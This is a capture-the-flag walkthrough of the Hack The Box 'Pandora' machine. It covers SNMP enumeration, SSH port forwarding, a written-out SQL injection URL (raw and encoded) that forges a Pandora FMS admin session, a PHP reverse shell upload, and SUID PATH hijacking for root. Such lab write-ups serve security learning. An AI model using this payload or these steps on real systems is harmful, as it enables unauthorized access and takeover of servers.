In this post, I would like to share a walkthrough of the Pandora Machine from Hack the Box


This room will be considered as an Easy machine on Hack The box

What will you gain from the Pandora machine?


For the user flag, you will need to use snmpwalk for further enumeration. We need to execute some sqli attack methods to get the admin dashboard


As for the root flag, you need to access the machine using matt’s access via ssh service and then abuse one SUID file to obtain a root shell.

Information Gathering on Pandora Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

Pandora machine

Let’s open the website interface


Sadly, there’s nothing that we can use by roaming the website now. As a result, let’s enumerate more with the Gobuster tool

SNMPWalk enumeration on pandora


There’s nothing that we can work on. Let’s enumerate more on UDP port scanning


We managed to notice there’s a port 161 open which it’s an SNMP service.


Based on my experience as Pentester, we can use snmpwalk tool to enumerate the SNMP a little further

** Snmpwalk should be available within Kali Linux OS by default. However, we can manually install the snmpwalk tool by running the following command (sudo apt-get install snmp) **


Oh wow! We managed to sight the username and password


We can try to access the machine via ssh

Port Forwarding on the pandora machine


Voila! However, we cannot retrieve the user flag even though we are able to access the machine via ssh.


Let’s try to see what port is been open by running netstat -an command


As a result, we can proceed with port forwarding with port 80

Pandora website interface


Finally, we can access another website interface with the port forwarding


The default credentials that have been found on the internet will not be used to access


Let’s do some research on Pandora FMS product


As a result, we have found one website that can be useful to us so that we proceed with the next step


After reading the information we received, we can try to access the php file such as /include/chart_generator.php which only give us an error that states “Access is not granted


We should be running sqlmap to get a better understanding of the vulnerability that explains on the website.


Therefore, we need to retrieve a session-id by executing the command that is used by sqlmap.

Image

At last, we managed to obtain a session id for Daniel and matt’s username.


Let’s copy-paste the session id that we found during the previous activity. The URL of the website interface can be used such as

http://127.0.0.1/pandora_console/include/chart_generator.php?session_id=<session id>


A dashboard will appear but sadly we cannot find any useful


Therefore, we might need to get another session id that we can use to get complete usage of the Pandora website.


As we already know, the pandora website has been vulnerable to SQL Injection


The SQL Injection that can be abused will look something as below:

http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=' union SELECT 1,2,'id_usuario|s:5:"admin";' as data -- SgGO

The SQL syntax above shows the code before it has been encoded

 http://127.0.0.1:8888/pandora_console/include/chart_generator.php?session_id=%27%20union%20SELECT%201,2,%27id_usuario|s:5:%22admin%22;%27%20as%20data%20--%20SgGO

Voila! We have access to the admin dashboard of Pandora FMS by using the sqli method after refreshing the URL 127.0.0.1

Gaining the Privileges Access


While analyzing the source code of the website, I notice that they are using PHP file formatting. As a result, we should be able to use a PHP reverse shell to obtain a reverse shell.


We should start our nc listener so that we can retrieve the reverse shell on our attacker’s machine


Under Admin tools, there are a few ways to upload our PHP reverse shell file on the website. However, I will use File Manager for that purpose.


The screenshot above is showing the file directory such as the images directory


Let’s upload the file as shown in the screenshot above.


The uploaded have been successful.


Therefore, we can get the reverse shell connection back to us by initializing the shell on the website’s directory


Boom! We have our reverse shell connection to us.


We have successfully accessed the machine as matt privileges access.


For us to get an actual shell, we can be running the bash -i command


We can read the user flag by running the command “cat user.txt

Escalate to Root Privileges Access


For us to obtain a proper shell on the machine, we might need to access the machine via ssh service.

Obtaining a proper ssh access


For us to access via ssh, we need to generate an ssh-keygen so that we proceed with the next step.


We need to transfer our public key into the machine by using wget command like the screenshot above


We need to move the id_rsa.pub to a different file such as authorized keys.


For us to get ssh access to work, we need to give file permission to 600

Image

Sadly, we cannot access the machine using matt privileges access via ssh service.


After talking to my friends and trying multiple ways on the machine, I managed to solve the issues by changing HackTheBox’s VPN from a release VPN to a normal VPN.


Uwu! We have successfully accessed the machine via ssh service.


Let’s search for any SUID file or weird that we can use to escalate to root privileges access. Sadly, nothing is interesting on the /var/backups directory.


As a result, we need to explore more on another directory while looking for any file that looks suspicious to us.


Finally, we found a file that look weird at least for me. There’s a file called pandora_backup which is highlighted as red.

Enumerate further with linpeas.sh


Let’s try to download linpeas.sh into the victim’s machine and give permission to the file


Let’s analyze the result while it still running in the background.


Therefore, let’s analyze the file where I might find something understandable to read.


While we are reading the file carefully, I notice there’s a line that refers to pandora-backup.tar.gz which might lead us to abuse the tar function.


I will explain each step that appears above carefully.


We manage to find a tar file inside the pandora_backup which make thinking that we can put some root privileges command into a file call tar


As a result, we are required to give permission to the tar file.


For the SUID file to work, a command to export the path is required to execute.


After that, we can execute the SUID file (/usr/bin/pandora_backup) to obtain a root shell.

Pandora Root flag

We can read the root flag by running the “cat root.txt” command


-THE END-


Happy Learning Guys!

Extra Information


We can go to /etc/shadow so that we can unlock and read the write-up